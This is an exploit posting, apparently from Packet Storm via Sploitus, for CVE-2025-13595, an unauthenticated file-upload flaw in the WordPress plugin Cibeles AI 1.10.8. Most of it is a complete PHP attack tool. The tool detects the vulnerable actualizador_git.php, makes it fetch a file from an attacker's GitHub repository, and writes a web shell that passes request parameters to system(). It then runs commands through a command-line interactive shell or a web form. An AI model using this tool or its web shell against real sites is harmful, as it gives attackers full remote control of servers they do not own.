Share
## https://sploitus.com/exploit?id=PACKETSTORM:216516
=============================================================================================================================================
| # Title : WordPress Cibeles AI 1.10.8 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/cibeles-ai/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/212112/ & CVE-2025-13595
[+] Summary :
an unauthenticated arbitrary file upload vulnerability in the CIBELES AI plugin for WordPress versions 1.10.8 and earlier.
The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration functionality, leading to remote code execution and complete server compromise.
The vulnerability exists in the actualizador_git.php file which provides unauthenticated access to download and execute files from arbitrary GitHub repositories without proper security controls.
[+] POC :
# Execute a single command
`php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell
`php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo
`php cibeles_exploit.php --create-shell`
<?php
/**
* CIBELES AI <= 1.10.8 - Unauthenticated Arbitrary File Upload RCE Exploit (CVE-2025-13595)
* Author: indoushka
* Vendor: https://ai.cibeles.net/
* Vulnerable Versions: <= 1.10.8
*/
class CibelesAIExploit {
private $target;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
}
public function check_vulnerability() {
echo "[*] Checking if target is vulnerable...\n";
// Check if CIBELES AI plugin exists
$plugin_path = $this->target . '/wp-content/plugins/cibeles-ai/';
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
// Check for plugin directory
$response = @file_get_contents($plugin_path, false, $context);
if ($response === false) {
// Check for actualizador_git.php directly
$exploit_url = $this->target . '/wp-content/plugins/cibeles-ai/actualizador_git.php';
$response = @file_get_contents($exploit_url, false, $context);
if ($response !== false) {
echo "[+] CIBELES AI plugin detected - likely vulnerable\n";
return true;
}
} else {
echo "[+] CIBELES AI plugin directory found - likely vulnerable\n";
return true;
}
echo "[-] CIBELES AI plugin not found or not accessible\n";
return false;
}
public function exploit($owner, $repo, $token, $command = 'whoami') {
echo "[*] Exploiting actualizador_git.php vulnerability...\n";
echo "[*] Target: " . $this->target . "\n";
echo "[*] GitHub Repository: {$owner}/{$repo}\n";
$exploit_url = $this->target . '/wp-content/plugins/cibeles-ai/actualizador_git.php';
$params = [
'owner' => $owner,
'repo' => $repo,
'ref' => 'main',
'token' => $token
];
$query_string = http_build_query($params);
$full_url = $exploit_url . '?' . $query_string;
echo "[*] Sending exploit request...\n";
echo "[*] URL: " . $full_url . "\n";
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 30,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
$response = @file_get_contents($full_url, false, $context);
if ($response === false) {
echo "[-] Exploit request failed\n";
return false;
}
echo "[+] Exploit executed. Response:\n";
echo $response . "\n";
// Test shell access
echo "\n[*] Testing shell access...\n";
$this->test_shell($command);
return true;
}
private function test_shell($command) {
$shell_url = $this->target . '/wp-content/plugins/cibeles-ai/shell.php';
$test_url = $shell_url . '?cmd=' . urlencode($command);
echo "[*] Testing command: {$command}\n";
echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n";
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response === false) {
echo "[-] Shell not accessible or command failed\n";
} else {
echo "[+] Command output:\n";
echo $response . "\n";
}
}
public function create_malicious_repo() {
echo "[*] Creating malicious shell.php for GitHub repository...\n";
$shell_content = '<?php
if(isset($_GET[\'cmd\'])) {
system($_GET[\'cmd\']);
echo "\n";
}
if(isset($_POST[\'cmd\'])) {
system($_POST[\'cmd\']);
echo "\n";
}
?>';
file_put_contents('shell.php', $shell_content);
echo "[+] Created shell.php - upload this to your GitHub repository\n";
echo "[+] Repository structure should be: /shell.php in main branch\n";
}
public function interactive_shell() {
$shell_url = $this->target . '/wp-content/plugins/cibeles-ai/shell.php';
echo "[+] Starting interactive shell...\n";
echo "[+] Shell URL: {$shell_url}\n";
echo "[+] Type 'exit' to quit\n\n";
while (true) {
echo "cmd> ";
$command = trim(fgets(STDIN));
if ($command === 'exit') {
break;
}
if (!empty($command)) {
$test_url = $shell_url . '?cmd=' . urlencode($command);
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response !== false) {
echo $response . "\n";
} else {
echo "[-] Command failed or shell not accessible\n";
}
}
}
}
}
// Command line interface
if (php_sapi_name() === 'cli') {
echo "
โโโโโโโ โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโ
โโโโโโโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
โโโโโโ โโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
CIBELES AI <= 1.10.8 Unauthenticated RCE Exploit (CVE-2025-13595)
By: indoushka
\n";
$options = getopt("t:o:r:k:c:ih", [
"target:",
"owner:",
"repo:",
"token:",
"command:",
"interactive",
"help",
"create-shell"
]);
if (isset($options['h']) || isset($options['help']) || $argc == 1) {
echo "Usage: php cibeles_exploit.php [options]\n";
echo "Options:\n";
echo " -t, --target Target URL (required)\n";
echo " -o, --owner GitHub repository owner (required)\n";
echo " -r, --repo GitHub repository name (required)\n";
echo " -k, --token GitHub Personal Access Token (required)\n";
echo " -c, --command Command to execute (default: whoami)\n";
echo " -i, --interactive Start interactive shell\n";
echo " --create-shell Create malicious shell.php for GitHub repo\n";
echo " -h, --help Show this help message\n";
echo "\nExamples:\n";
echo " php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n";
echo " php cibeles_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n";
echo " php cibeles_exploit.php --create-shell\n";
exit(1);
}
if (isset($options['create-shell'])) {
$exploit = new CibelesAIExploit('');
$exploit->create_malicious_repo();
exit(0);
}
if (!isset($options['t']) && !isset($options['target'])) {
echo "Error: Target URL is required\n";
exit(1);
}
if (!isset($options['o']) && !isset($options['owner'])) {
echo "Error: GitHub owner is required\n";
exit(1);
}
if (!isset($options['r']) && !isset($options['repo'])) {
echo "Error: GitHub repository is required\n";
exit(1);
}
if (!isset($options['k']) && !isset($options['token'])) {
echo "Error: GitHub token is required\n";
exit(1);
}
$target = isset($options['t']) ? $options['t'] : $options['target'];
$owner = isset($options['o']) ? $options['o'] : $options['owner'];
$repo = isset($options['r']) ? $options['r'] : $options['repo'];
$token = isset($options['k']) ? $options['k'] : $options['token'];
$command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');
$exploit = new CibelesAIExploit($target);
// Check vulnerability first
if (!$exploit->check_vulnerability()) {
echo "[-] Target does not appear to be vulnerable\n";
exit(1);
}
if (isset($options['i']) || isset($options['interactive'])) {
// Execute exploit then start interactive shell
$exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"');
$exploit->interactive_shell();
} else {
// Single command execution
$exploit->exploit($owner, $repo, $token, $command);
}
} else {
// Web interface
if (isset($_POST['exploit'])) {
$target = $_POST['target'] ?? '';
$owner = $_POST['owner'] ?? '';
$repo = $_POST['repo'] ?? '';
$token = $_POST['token'] ?? '';
$command = $_POST['command'] ?? 'whoami';
if ($target && $owner && $repo && $token) {
$exploit = new CibelesAIExploit($target);
ob_start();
$exploit->check_vulnerability();
$exploit->exploit($owner, $repo, $token, $command);
$output = ob_get_clean();
echo "<pre>$output</pre>";
} else {
echo "<div style='color: red;'>All fields are required</div>";
}
} else {
echo '<!DOCTYPE html>
<html>
<head>
<title>CIBELES AI RCE Exploit</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 600px; margin: 0 auto; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; font-weight: bold; }
input[type="text"], input[type="password"] {
width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
}
button {
background: #007cba; color: white; padding: 10px 20px;
border: none; border-radius: 4px; cursor: pointer;
}
.help { font-size: 12px; color: #666; margin-top: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>CIBELES AI RCE Exploit (CVE-2025-13595)</h1>
<form method="post">
<input type="hidden" name="exploit" value="1">
<div class="form-group">
<label for="target">Target URL:</label>
<input type="text" id="target" name="target" placeholder="https://example.com" required>
<div class="help">Full URL of the WordPress site</div>
</div>
<div class="form-group">
<label for="owner">GitHub Owner:</label>
<input type="text" id="owner" name="owner" placeholder="yourusername" required>
<div class="help">GitHub username or organization name</div>
</div>
<div class="form-group">
<label for="repo">GitHub Repository:</label>
<input type="text" id="repo" name="repo" placeholder="malicious-repo" required>
<div class="help">Repository containing shell.php</div>
</div>
<div class="form-group">
<label for="token">GitHub Token:</label>
<input type="password" id="token" name="token" placeholder="ghp_xxx" required>
<div class="help">GitHub Personal Access Token with repo access</div>
</div>
<div class="form-group">
<label for="command">Command:</label>
<input type="text" id="command" name="command" value="whoami">
<div class="help">Command to execute on target</div>
</div>
<button type="submit">Execute Exploit</button>
</form>
<div style="margin-top: 30px; padding: 15px; background: #f5f5f5; border-radius: 4px;">
<h3>Setup Instructions:</h3>
<ol>
<li>Create a GitHub repository with a shell.php file</li>
<li>Generate a GitHub Personal Access Token with repo permissions</li>
<li>Fill in the form above and execute</li>
</ol>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================